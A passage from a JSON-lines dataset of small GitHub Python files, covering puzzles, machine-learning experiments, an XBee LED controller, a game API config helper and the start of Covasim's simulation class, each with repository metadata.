main()","repo_name":"Chenzo46/Coding-problems","sub_path":"fibbonacci.py","file_name":"fibbonacci.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71337172394","text":"\"\"\"\nSolve the multiplication puzzle:\n\n x02\n y9\nx------\n 1abc8\n\n\"\"\"\nimport z3\n\n\nif __name__ == '__main__':\n solver = z3.Solver()\n\n x, y, a, b, c = z3.Ints('x y a b c')\n sym_digits = (x, y, a, b, c)\n digit_constraints = [z3.And(0 <= s, s <= 9) for s in sym_digits]\n\n multiplicant1 = 100*x + 2\n multiplicant2 = 10*y + 9\n product = 10000 + 100*a + 10*b + 8\n\n solver.add(product == multiplicant1 * multiplicant2, *digit_constraints)\n result = solver.check()\n if result == z3.sat:\n model = solver.model()\n m1 = 100*model[x].as_long() + 2\n m2 = 10*model[y].as_long() + 9\n print(f\"{m1} x {m2} = {m1*m2}\")\n else:\n print(\"No solution\")\n","repo_name":"benjaminfjones/toy-puzzles","sub_path":"src/ingrid_digit_puzzle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15033626339","text":"class Vector(object):\r\n def __init__(self, pos1, pos2):\r\n self.point1 = pos1\r\n self.point2 = pos2\r\n self.size_x = pos2[0] - pos1[0]\r\n self.size_y = pos2[1] - pos1[1]\r\n\r\n def get_cross(self, other: \"Vector\"):\r\n return self.size_x * other.size_y - self.size_y * other.size_x\r\n\r\n def check_crossing(self, other: \"Vector\"):\r\n vec1, vec2 = Vector(self.point1, other.point1), Vector(self.point1, other.point2)\r\n vec3, vec4 = Vector(other.point1, self.point1), Vector(other.point1, self.point2)\r\n return self.get_cross(vec1) * self.get_cross(vec2) < 0 and \\\r\n other.get_cross(vec3) * other.get_cross(vec4) < 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pos = list(map(int, input().split()))\r\n line = Vector(pos[0:2], pos[2:])\r\n N = int(input())\r\n a = [list(map(int, input().split())) for _ in [0]*N]\r\n a += [a[0]]\r\n count = 0\r\n\r\n for p1, p2 in zip(a, a[1:]):\r\n if Vector(p1, p2).check_crossing(line):\r\n count += 1\r\n\r\n print(count//2 + 1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc016/D/3519247.py","file_name":"3519247.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21407000476","text":"import numpy as np\nimport matplotlib.pyplot as plt \nfrom sklearn import datasets\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import DBSCAN\nfrom preprocessing import read_data, path_to_batches, get_filenames, load_data\nfrom networks.play_lmp import PlayLMP\nimport utils.constants as constants\nimport os \nimport cv2\n\ndef load_paths():\n valid_filenames = [ \"friday_microwave_topknob_bottomknob_slide_%d_path\"%i for i in [3,6,8,9,11] ]\n data_filenames = [ \"./data/validation/%s.pkl\"%data_file for data_file in valid_filenames ]\n paths = load_data(data_filenames)\n return paths\n\ndef save_imgs(labels, images, skip_frames=0, save_dir =\"./analysis/recognition_clusters/\"):\n #images = [batch, seq_len, 3, 300, 300]\n for label in range(labels.max()+1): # ignore outliers since starts at 0\n cluster_imgs = images[labels == label] # All sequences in the same cluster\n save_inds = np.random.choice(cluster_imgs.shape[0], 25) # Select 25 rand imgs to save\n save_imgs = np.transpose(cluster_imgs[save_inds], (0,1,3,4,2)) # Order channels for CV2 save (25, seq_len, 300, 300, 3)\n\n #Save each sequence as a single image\n save_imgs = tuple(save_imgs[:, i] for i in range(0, save_imgs.shape[1], skip_frames+1))\n save_imgs = np.concatenate(save_imgs, axis=2) # (25, 300, 600, 3), append to width\n\n #save_directory\n dirname = save_dir + \"cluster_%d/\" % label\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n for ind, img in enumerate(save_imgs, 1): \n save_path = \"%simg_%d.png\" % (dirname, ind)\n cv2.imwrite(save_path, cv2.cvtColor(img, cv2.COLOR_RGB2BGR)) #save as blue shelfs\n\ndef temporal_tsne(model_path):\n save_dir = \"./analysis/temporal_tsne/\"\n save_name = \"clusters\"\n n_mix = 10\n use_logistics = True\n show = False\n\n #Initialize model\n model = PlayLMP(num_mixtures=n_mix, use_logistics=use_logistics)\n model.load(model_path)\n\n #Load data \n paths = load_paths()\n #Transform data into plans\n X = []\n path_lengths = []\n all_images = []\n for path in paths:\n path_plans = []\n data_obs, data_imgs, _ = path_to_batches(path, window_size=32, batch_size=64, validation=True)\n for j in range(len(data_obs)):\n plans_batch = model.get_pp_plan(data_obs[j], data_imgs[j]).detach().cpu().numpy()\n path_plans.append(plans_batch)\n path_plans = np.concatenate(path_plans, axis=0)\n path_lengths.append(path_plans.shape[0])\n X.append(path_plans)\n all_images.append(np.concatenate(data_imgs, axis=0))\n all_images = np.concatenate(all_images, axis=0)\n\n #Find clusters\n X = np.concatenate(X, axis=0)\n X = PCA(n_components=50, random_state=1).fit_transform(X) #(batch, 50)\n X = TSNE(n_components=2, random_state=1).fit_transform(X) #(batch, 2)\n clusters = DBSCAN(eps=2, min_samples=5)\n labels = clusters.fit_predict(X)\n print(labels)\n #Temporal visualization of clusters\n c = 0\n for idx, path_length in enumerate(path_lengths):\n aux_labels = labels[c : c + path_length]\n plt.scatter(np.arange(path_length), np.zeros(path_length) + idx, c=aux_labels, cmap=\"nipy_spectral\")\n c += path_length\n\n #Plot visuals\n plt.suptitle(\"Temporal Analysis\")\n plt.title(\"Microwave - Topknob - Bottomknob - Slide\")\n for spine in plt.gca().spines.values():\n spine.set_visible(False)\n plt.gca().get_yaxis().set_visible(False)\n if(show):\n plt.show()\n\n #Save temporal plot\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n plt.savefig(\"%s%s.png\"%(save_dir, \"Temporal\"), dpi=100) #save cluster images\n\n #Plot clusters\n fig, ax = plt.subplots()\n scatter = ax.scatter(X[:,0], X[:,1], c=labels, cmap=\"nipy_spectral\")\n fig.suptitle(\"Latent space\")\n ax.axis('off')\n \n # Plot legends\n fig_legends, ax_legends = plt.subplots(figsize = (3,10))\n n_classes = np.unique(labels)\n legend1 = ax_legends.legend(*scatter.legend_elements(num = n_classes ), title=\"Classes\", loc='center')\n ax_legends.add_artist(legend1)\n\n #save in analysis/tsne\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n fig.savefig(\"%s%s.png\"%(save_dir,save_name), dpi=100) #save cluster images\n fig_legends.savefig(\"%s%s_labels.png\"%(save_dir,save_name), dpi=100) #save legends\n\n if(show):\n plt.show()\n \n data_imgs = np.concatenate(data_imgs, axis=0) # batch_size , seq_len, img_size\n return labels, all_images\n\nif __name__ == '__main__':\n cluster_labels, seq_imgs = temporal_tsne(model_path=\"./models/10_logistic_multitask_bestacc_new.pth\")\n save_imgs(cluster_labels, seq_imgs, save_dir =\"./analysis/temporal_tsne/proposal_clusters/\")\n","repo_name":"ErickRosete/Robot-Skills-from-Video","sub_path":"temporal_tsne_analysis.py","file_name":"temporal_tsne_analysis.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16985985386","text":"#!/usr/bin/python3\n\"\"\"Base class that defines all common attributes/methods for other classes\"\"\"\nimport uuid\nimport models\nfrom datetime import datetime\nfrom sqlalchemy import Column, Integer, String, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\n\n\nBase = declarative_base()\n\n\nclass BaseModel:\n \"\"\"A base class for all hbnb models\"\"\"\n id = Column(String(60), unique=True, nullable=False, primary_key=True)\n created_at = Column(DateTime, nullable=False, default=(datetime.utcnow()))\n updated_at = Column(DateTime, nullable=False, default=(datetime.utcnow()))\n\n def __init__(self, *args, **kwargs):\n \"\"\"Instatntiates a new model\"\"\"\n if kwargs:\n for key, value in kwargs.items():\n if key == \"created_at\" or key == \"updated_at\":\n value = datetime.strptime(value, \"%Y-%m-%dT%H:%M:%S.%f\")\n if key != \"__class__\":\n setattr(self, key, value)\n if \"id\" not in kwargs:\n self.id = str(uuid.uuid4())\n if \"created_at\" not in kwargs:\n self.created_at = datetime.now()\n if \"updated_at\" not in kwargs:\n self.updated_at = datetime.now()\n else:\n self.id = str(uuid.uuid4())\n self.created_at = self.updated_at = datetime.now()\n\n def __str__(self):\n \"\"\"Returns a string representation of the instance\"\"\"\n return f\"[{type(self).__name__}] ({self.id}) {self.__dict__}\"\n\n def __repr__(self):\n \"\"\"Returns a string representaion of the instance\"\"\"\n return self.__str__()\n\n def save(self):\n \"\"\"Updates updated_at with current time when instance is changed\"\"\"\n self.updated_at = datetime.now()\n models.storage.new(self)\n models.storage.save()\n\n def to_dict(self):\n \"\"\"Convert instance into dict format\"\"\"\n my_dict = dict(self.__dict__)\n my_dict[\"__class__\"] = str(type(self).__name__)\n my_dict[\"created_at\"] = self.created_at.isoformat()\n my_dict[\"updated_at\"] = self.updated_at.isoformat()\n if '_sa_instance_state' in my_dict.keys():\n del my_dict['_sa_instance_state']\n return my_dict\n\n def delete(self):\n \"\"\"Deletes instance from storage\"\"\"\n models.storage.delete(self)\n","repo_name":"benbiji/AirBnB_clone_v2","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15118011724","text":"try:\n linux_interaction()\n with open ('file.log') as file:\n read_data = file.read()\n\nexcept FileNotFoundError as fnf_error:\n print(fnf_error)\n\nexcept AssertionError as error:\n print('Linux linux_interaction() function was not excluded')","repo_name":"22Rish15/Python-1.1","sub_path":"Exception Handling/try and except_2.py","file_name":"try and except_2.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12916149976","text":"import csv\n\nimport numpy as np\n\n\nclass RBF:\n W_matrix = V_matrix = radius = None\n LAMDA = 1\n\n def __init__(self, x=None, y=None, num_circles=0, is_regression=False, load_data=False):\n self.is_regression = is_regression\n if not load_data:\n self.X = x\n self.y = y\n self.NUM_FEATURES = x.shape[1]\n self.NUM_SAMPLES = x.shape[0]\n self.NUM_CIRCLE = num_circles\n else:\n self.W_matrix, self.V_matrix, self.radius = self.load_network()\n self.NUM_CIRCLE = self.radius.size\n\n\n\n def evaluate(self, individual):\n self.V_matrix = np.reshape(individual, (-1, self.NUM_FEATURES + 1))\n self.radius = self.V_matrix[:, 0]\n self.V_matrix = self.V_matrix[:, 1:]\n G_matrix = np.empty((self.NUM_SAMPLES, self.NUM_CIRCLE))\n for i in range(self.NUM_SAMPLES):\n for j in range(self.NUM_CIRCLE):\n G_matrix[i, j] = self.cal_g(self.radius[j], self.X[i], self.V_matrix[j])\n self.W_matrix = self.cal_W(G_matrix, self.y)\n y_star = np.matmul(G_matrix, self.W_matrix)\n if self.is_regression:\n loss = self.loss_regression(self.y, y_star)\n else:\n loss = self.loss_classification(self.y, y_star)\n return loss,\n\n def predict(self, individual):\n self.V_matrix = np.reshape(individual, (-1, self.NUM_FEATURES + 1))\n self.radius = self.V_matrix[:, 0]\n self.V_matrix = self.V_matrix[:, 1:]\n G_matrix = np.empty((self.NUM_SAMPLES, self.NUM_CIRCLE))\n for i in range(self.NUM_SAMPLES):\n for j in range(self.NUM_CIRCLE):\n G_matrix[i, j] = self.cal_g(self.radius[j], self.X[i], self.V_matrix[j])\n self.W_matrix = self.cal_W(G_matrix, self.y)\n y_star = np.matmul(G_matrix, self.W_matrix)\n if self.is_regression:\n return y_star\n else:\n # y_star = 1 / (1 + np.e ** -y_star)\n return np.argmax(y_star, axis=1)\n\n def validation(self, X, y):\n G_matrix = np.empty((X.shape[0], self.NUM_CIRCLE))\n for i in range(X.shape[0]):\n for j in range(self.NUM_CIRCLE):\n G_matrix[i, j] = self.cal_g(self.radius[j], X[i], self.V_matrix[j])\n self.W_matrix = self.cal_W(G_matrix, y)\n y_star = np.matmul(G_matrix, self.W_matrix)\n if self.is_regression:\n return y_star, self.loss_regression(y, y_star)\n else:\n # y_star = 1 / (1 + np.e ** -y_star)\n return np.argmax(y_star, axis=1), self.loss_classification(y, y_star)\n\n def cal_W(self, G, y):\n regulated_G = np.matmul(np.transpose(G), G) + self.LAMDA * np.eye(self.NUM_CIRCLE)\n inverse = np.matmul(np.linalg.inv(regulated_G), np.transpose(G))\n return np.matmul(inverse, y)\n\n def save_network(self):\n file = open(\"W_matrix.csv\", 'w')\n for i in range(self.W_matrix.shape[0]):\n for j in range(self.W_matrix.shape[1] - 1):\n file.write(str(self.W_matrix[i, j]))\n file.write(',')\n file.write(str(self.W_matrix[i, self.W_matrix.shape[1] - 1]))\n file.write('\\n')\n file.close()\n\n file = open(\"V_matrix.csv\", 'w')\n for i in range(self.V_matrix.shape[0]):\n for j in range(self.V_matrix.shape[1] - 1):\n file.write(str(self.V_matrix[i, j]))\n file.write(',')\n file.write(str(self.V_matrix[i, self.V_matrix.shape[1] - 1]))\n file.write('\\n')\n file.close()\n\n file = open(\"radius.csv\", 'w')\n for i in range(self.radius.shape[0] - 1):\n file.write(str(self.radius[i]))\n file.write(',')\n file.write(str(self.radius[self.radius.shape[0] - 1]))\n file.write('\\n')\n file.close()\n print(self.radius)\n print(self.W_matrix)\n print(self.V_matrix)\n\n def load_network(self):\n W_matrix = self.read_csv('W_matrix.csv')\n V_matrix = self.read_csv('V_matrix.csv')\n radius = self.read_csv('radius.csv')\n W_matrix = np.array(W_matrix)\n V_matrix = np.array(V_matrix)\n radius = np.array(radius)\n radius = radius[0]\n return W_matrix, V_matrix, radius\n\n @staticmethod\n def read_csv(file_name):\n matrix = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n matrix.append(list(map(float, row)))\n matrix = np.array(matrix)\n return matrix\n\n @staticmethod\n def cal_g(radius, x, v):\n vector = radius * np.dot(x - v, x - v)\n return np.exp(-vector)\n\n @staticmethod\n def loss_regression(y, y_star):\n return 0.5 * np.matmul((y_star - y).T, y_star - y)\n\n @staticmethod\n def loss_classification(y, y_star):\n return (np.sum(np.sign(np.abs(np.argmax(y, axis=1) - np.argmax(y_star, axis=1))))) / len(y_star)\n","repo_name":"MhmDSmdi/Neural-Network-using-RBF-kernel","sub_path":"rbf_handler.py","file_name":"rbf_handler.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"488099810","text":"import RPi.GPIO as GPIO\nfrom digi.xbee.devices import XBeeDevice\nfrom digi.xbee.models.status import NetworkDiscoveryStatus\n\n# used serial port on RPi\nPORT = \"/dev/ttyUSB0\" \n\n# baud rate of the devices\nBAUD_RATE = 9600 \n\n# GPIO 18 on RPi\nled = 12 \n\nGPIO.setwarnings(False)\n\n# PAN ID for the coordinator\nREMOTE_ID = \"Coordinator\" \n\n\n# information for the endpoint\nend_device = XBeeDevice(PORT, BAUD_RATE) \n\n\n\n# function for the userinput on the coordinator side of the code. When the user writes 1/0. Data will be sent to the coordinator when the LED is on/off\ndef data_receive_callback(xbee_message): \n xbee_network = end_device.get_network()\n remote_device = xbee_network.discover_device(REMOTE_ID)\n print(xbee_message.data.decode())\n if xbee_message.data.decode() == \"1\":\n print(\"The LED is ON\")\n GPIO.output(led, GPIO.HIGH)\n end_device.send_data_async(remote_device, \"Message from Endpoint: You just turned the LED ON\")\n elif xbee_message.data.decode() == \"0\":\n GPIO.output(led, GPIO.LOW)\n end_device.send_data_async(remote_device, \"Message from Endpoint...: You just turned the LED OFF\")\n print(\"The LED is OFF\")\n else:\n print(\"Unrecognized input\")\n\n\n# indicates the setup for the RPi.\ndef setup(): \n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(led, GPIO.OUT)\n GPIO.output(led, GPIO.LOW)\n \n\n# \"Waiting for data\" messege when the code is running and waiting for data received.\ndef main():\n \n try:\n end_device.open()\n end_device.add_data_received_callback(data_receive_callback)\n \n print(\"Waiting for data...\\n\")\n input()\n \n \n# stop when the needed information is received\n finally:\n if end_device is not None and end_device.is_open():\n end_device.close()\n\ndef destroy():\n GPIO.output(14, GPIO.LOW)\n GPIO.cleanup() #CTRL+C\n exit()\n\nif __name__ == '__main__':\n setup()\n try:\n main()\n except KeyboardInterrupt:\n destroy()","repo_name":"aikamadeitah/IT-Technology-Courses","sub_path":"Embedded-Systems/Code/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43281641918","text":"\"\"\"代码例子来自:https://www.jianshu.com/p/719fc024c0ec\n\"\"\"\n\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import GradientBoostingClassifier as GBDT\nfrom sklearn.ensemble import ExtraTreesClassifier as ET\nfrom sklearn.ensemble import RandomForestClassifier as RF\nfrom sklearn.ensemble import AdaBoostClassifier as ADA\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_auc_score\nimport numpy as np\n\n\"\"\"准备数据\n\"\"\"\nx,y = make_classification(n_samples=6000)\nX_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.5)\n\n\"\"\"定义第一层:第一层模型尽量选择选择表达能力强的,这样才能保证后面模型能够获取足够的信息\n\"\"\"\nclfs = [ GBDT(n_estimators=100),\n RF(n_estimators=100),\n ET(n_estimators=100),\n ADA(n_estimators=100)\n]\nX_train_stack = np.zeros((X_train.shape[0], len(clfs)))\nX_test_stack = np.zeros((X_test.shape[0], len(clfs))) \n\n\"\"\"6折交叉验证,同时通过第一层的强模型训练预测生成喂给第二层的特征数据。\n\"\"\"\n### 6折stacking\nn_folds = 6\nskf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=1)\nfor i,clf in enumerate(clfs):\n# print(\"分类器:{}\".format(clf))\n X_stack_test_n = np.zeros((X_test.shape[0], n_folds))\n for j,(train_index,test_index) in enumerate(skf.split(X_train,y_train)):\n tr_x = X_train[train_index]\n tr_y = y_train[train_index]\n clf.fit(tr_x, tr_y)\n #生成stacking训练数据集\n X_train_stack [test_index, i] = clf.predict_proba(X_train[test_index])[:,1]\n X_stack_test_n[:,j] = clf.predict_proba(X_test)[:,1]\n #生成stacking测试数据集\n X_test_stack[:,i] = X_stack_test_n.mean(axis=1)\n\n\"\"\"为了防止过拟合,第二层选择了一个简单的Logistics回归模型。输出Stacking模型的auc得分\n\"\"\"\nclf_second = LogisticRegression(solver=\"lbfgs\")\nclf_second.fit(X_train_stack,y_train)\npred = clf_second.predict_proba(X_test_stack)[:,1]\nscore = roc_auc_score(y_test,pred)#0.9946\nprint(score)\n\n# GBDT分类器\nclf_1 = clfs[0]\nclf_1.fit(X_train,y_train)\npred_1 = clf_1.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_1)#0.9922\nprint(score)\n\n# 随机森林分类器\nclf_2 = clfs[1]\nclf_2.fit(X_train,y_train)\npred_2 = clf_2.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_2)#0.9944\nprint(score)\n\n# ExtraTrees分类器\nclf_3 = clfs[2]\nclf_3.fit(X_train,y_train)\npred_3 = clf_3.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_3)#0.9930\nprint(score)\n\n# AdaBoost分类器\nclf_4 = clfs[3]\nclf_4.fit(X_train,y_train)\npred_4 = clf_4.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test,pred_4)#0.9875\nprint(score)","repo_name":"wzzlYwzzl/notebooks","sub_path":"AIStudy/机器学习/集成学习/Stacking/code_example.py","file_name":"code_example.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"10263029792","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 27 12:40:00 2020\r\n\r\n@author: POOVAYUVA\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nsalary_train = pd.read_csv(r\"C:\\Users\\POOVAYUVA\\Desktop\\EXCELR ASSIGN\\NAIVE\\SalaryData_Train.csv\")\r\nsalary_test = pd.read_csv(r\"C:\\Users\\POOVAYUVA\\Desktop\\EXCELR ASSIGN\\NAIVE\\SalaryData_Test.csv\")\r\nstring_columns=[\"workclass\",\"education\",\"maritalstatus\",\"occupation\",\"relationship\",\"race\",\"sex\",\"native\"]\r\n\r\nfrom sklearn import preprocessing\r\nnumber = preprocessing.LabelEncoder()\r\nfor i in string_columns:\r\n salary_train[i] = number.fit_transform(salary_train[i])\r\n salary_test[i] = number.fit_transform(salary_test[i])\r\n \r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\ncolnames = salary_train.columns\r\nlen(colnames[0:13])\r\ntrainX = salary_train[colnames[0:13]]\r\ntrainY = salary_train[colnames[13]]\r\ntestX = salary_test[colnames[0:13]]\r\ntestY = salary_test[colnames[13]]\r\n\r\n\r\n# Create SVM classification object \r\n# 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed'\r\n\r\n# kernel = linear\r\nfrom sklearn.svm import SVC\r\n\r\nhelp(SVC)\r\n\r\nmodel_linear = SVC(kernel = \"linear\")\r\nmodel_linear.fit(trainX,trainY)\r\npred_test_linear = model_linear.predict(testX)\r\n\r\nnp.mean(pred_test_linear==testY) # Accuracy = 85.233\r\n\r\n# Kernel = poly\r\nmodel_poly = SVC(kernel = \"poly\")\r\nmodel_poly.fit(trainY,trainY)\r\npred_test_poly = model_poly.predict(testX)\r\n\r\nnp.mean(pred_test_poly==testY) # Accuracy = 94.499\r\n\r\n# kernel = rbf\r\nmodel_rbf = SVC(kernel = \"rbf\")\r\nmodel_rbf.fit(trainX,trainY)\r\npred_test_rbf = model_rbf.predict(testX)\r\n\r\nnp.mean(pred_test_rbf==testY) # Accuracy = 97.016\r\n\r\n\r\n\r\n","repo_name":"poovanan23/data-science","sub_path":"salary svm.py","file_name":"salary svm.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4338673227","text":"#SmiteAPIConfig.py\n#Contains all config information for SmiteAPIConfig.ini\n\n#imports\nimport configparser\nimport os\nimport sys\n\n#File path for the config file.\n# determine if application is a script file or frozen exe\nif getattr(sys, 'frozen', False):\n myDir = os.path.dirname(sys.executable)\nelif __file__:\n myDir = os.path.dirname(__file__)\nPATH_CONFIG_FILE = os.path.join(myDir, \"config.ini\")\n\nclass Option():\n def __init__(self, section_name, option_name):\n self.section_name = section_name\n self.option_name = option_name\n self.value = value\n\n return self\n\nclass Config():\n path_config_file = PATH_CONFIG_FILE\n\n # Sections\n # API SETTINGS\n SECTION_SMITE_API_SETTINGS = \"API SETTINGS\"\n SMITE_DEV_ID = \"DEV_ID\"\n SMITE_AUTH_KEY = \"AUTH_KEY\"\n PC_URL = \"PC_URL\"\n XBOX_URL = \"XBOX_URL\"\n PLAYSTATION_URL = \"PLAYSTATION_URL\"\n\n # Session. Stores current session details so a new one doesn't need to be created everytime a request is called\n SECTION_SESSION = \"SESSION\"\n OPTION_SESSION_ID = \"SESSION_ID\"\n OPTION_SESSION_TIMESTAMP = \"SESSION_TIMESTAMP\"\n\n BLANK_STRING = \" \"\n\n def __init__(self):\n # Sets the path of the config file, and the config object from import configparser\n self.config = configparser.Config()\n if (not os.path.exists(self.path_config_file)):\n print(\"\\nConfig File:\", self.path_config_file, \"does not exist, creating a new one.\")\n self.create_config_file()\n\n def create_config_file(self):\n # self.save_dev_id(\"{DEV ID}\")\n # self.save_auth_key(\"{AUTH KEY}\")\n self.save_pc_url(\"https://api.smitegame.com/smiteapi.svc\")\n self.save_xbox_url(\"https://api.xbox.smitegame.com/smiteapi.svc\")\n self.save_playstation_url(\"https://api.ps4.smitegame.com/smiteapi.svc\")\n\n self.save_config_file()\n\n\n def save_config_file(self):\n # Whether the function was successful to writing to the config file or not.\n result = False\n try:\n with open(self.path_config_file, 'w') as config_file:\n self.config.write(config_file)\n result = True\n except Exception as e:\n print(\"Unable to write to \", self.path_config_file)\n print(e)\n result = False\n return result\n\n def load_option(self, section_name, option_name):\n # None values are stored as \" \".\n value = None\n self.config.read(self.path_config_file)\n if (self.config.has_section(section_name)):\n if (self.config.has_option(section_name, option_name)):\n value = self.config[section_name][option_name]\n else:\n print(\"No option named \\\"\", option_name, \"\\\" inside of section \\\"\", section_name, \"\\\" within \\\"\", self.path_config_file, \"\\\".\"\n \"\\n\\tCheck ini file.\", sep=\"\")\n else:\n print(\"No section named \\\"\", section_name, \"\\\" within \\\"\", self.path_config_file, \"\\\".\",\n \"\\n\\tCheck ini file.\", sep=\"\")\n\n if value == self.BLANK_STRING:\n value = None\n return value\n\n def save_option(self, section_name, option_name, value):\n if value is None:\n value = \" \"\n else:\n value = str(value)\n\n self.config.read(self.path_config_file)\n if (self.config.has_section(section_name)):\n self.config[section_name][option_name] = value\n else:\n self.config[section_name] = {option_name: value}\n\n self.save_config_file()\n\n return value\n\n def load_smite_api_option(self, option_name):\n value = None\n section_name = self.SECTION_SMITE_API_SETTINGS\n value = self.load_option(self, section_name, option_name)\n\n return value\n\n def save_smite_api_option(self, option_name, value):\n section_name = self.SECTION_SMITE_API_SETTINGS\n value = self.save_option(self, self.SECTION_SMITE_API_SETTINGS, option_name, value)\n\n return value\n\n","repo_name":"james1projects/HatmasBot","sub_path":"SmiteAPIConfig.py","file_name":"SmiteAPIConfig.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28457444658","text":"import heapq\r\n\r\noperations = [\"I 16\", \"I -5643\", \"D -1\", \"D 1\", \"D 1\", \"I 123\", \"D -1\"]\r\ndef solution(operations):\r\n max_heap, min_heap = [], []\r\n for query in operations:\r\n q, n = query.split()\r\n n = int(n)\r\n if q == 'I':\r\n heapq.heappush(max_heap, -n)\r\n heapq.heappush(min_heap, n)\r\n elif q == 'D':\r\n if n == 1:\r\n if max_heap:\r\n x = -heapq.heappop(max_heap)\r\n min_heap.remove(x)\r\n elif n == -1:\r\n if min_heap:\r\n x = -heapq.heappop(min_heap)\r\n max_heap.remove(x)\r\n if max_heap:\r\n mx = -heapq.heappop(max_heap)\r\n else:\r\n mx = 0\r\n if min_heap:\r\n mn = heapq.heappop(min_heap)\r\n else:\r\n mn = 0\r\n return [mx, mn]\r\n\r\nsolution(operations)","repo_name":"park-hg/algorithm-study","sub_path":"dfs,bfs/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37302525024","text":"\"\"\"Find out Top 5 longest books to read\"\"\"\nimport pandas as pd\nimport sqlalchemy\nimport pymysql\n\nconnection = sqlalchemy.create_engine('mysql+pymysql://root@localhost/my_book')\n\nbooks = pd.read_csv(r\"..\\books.csv\", sep=',', error_bad_lines=False, index_col=0)\n\nprint(books.head())\n\nlongestbooks = books.sort_values('# num_pages', ascending=False)[:5]\nprint(longestbooks)\n\nlongestbooks.to_sql(name='longestbooks',con=connection, if_exists='replace',index=True)\n\nprint(\"Done\")","repo_name":"kartikshende/Books_Analysis_Assigment","sub_path":"AnalysisEachFile/LongestBooks.py","file_name":"LongestBooks.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32829555455","text":"'''\nDefines the Sim class, Covasim's core class.\n'''\n\n#%% Imports\nimport numpy as np\nimport pylab as pl\nimport sciris as sc\nfrom . import version as cvv\nfrom . import utils as cvu\nfrom . import misc as cvm\nfrom . import base as cvb\nfrom . import defaults as cvd\nfrom . import parameters as cvpar\nfrom . import population as cvpop\nfrom . import interventions as cvi\nfrom . import plotting as cvplt\n\n# Specify all externally visible things this file defines\n__all__ = ['Sim']\n\n\nclass Sim(cvb.BaseSim):\n '''\n The Sim class handles the running of the simulation: the number of children,\n number of time points, and the parameters of the simulation.\n\n Args:\n pars (dict): parameters to modify from their default values\n datafile (str): filename of (Excel) data file to load, if any\n datacols (list): list of column names of the data file to load\n label (str): the name of the simulation (useful to distinguish in batch runs)\n simfile (str): the filename for this simulation, if it's saved (default: creation date)\n popfile (str): the filename to load/save the population for this simulation\n load_pop (bool): whether or not to load the population from the named file\n kwargs (dict): passed to make_pars()\n\n **Examples**::\n\n sim = cv.Sim()\n sim = cv.Sim(pop_size=10e3, datafile='my_data.xlsx')\n '''\n\n def __init__(self, pars=None, datafile=None, datacols=None, label=None, simfile=None, popfile=None, load_pop=False, **kwargs):\n # Create the object\n default_pars = cvpar.make_pars(**kwargs) # Start with default pars\n super().__init__(default_pars) # Initialize and set the parameters as attributes\n\n # Set attributes\n self.label = label # The label/name of the simulation\n self.created = None # The datetime the sim was created\n self.simfile = simfile # The filename of the sim\n self.datafile = datafile # The name of the data file\n self.popfile = popfile # The population file\n self.data = None # The actual data\n self.popdict = None # The population dictionary\n self.t = None # The current time in the simulation\n self.people = None # Initialize these here so methods that check their length can see they're empty\n self.results = {} # For storing results\n self.initialized = False # Whether or not initialization is complete\n self.results_ready = False # Whether or not results are ready\n\n # Now update everything\n self.set_metadata(simfile, label) # Set the simulation date and filename\n 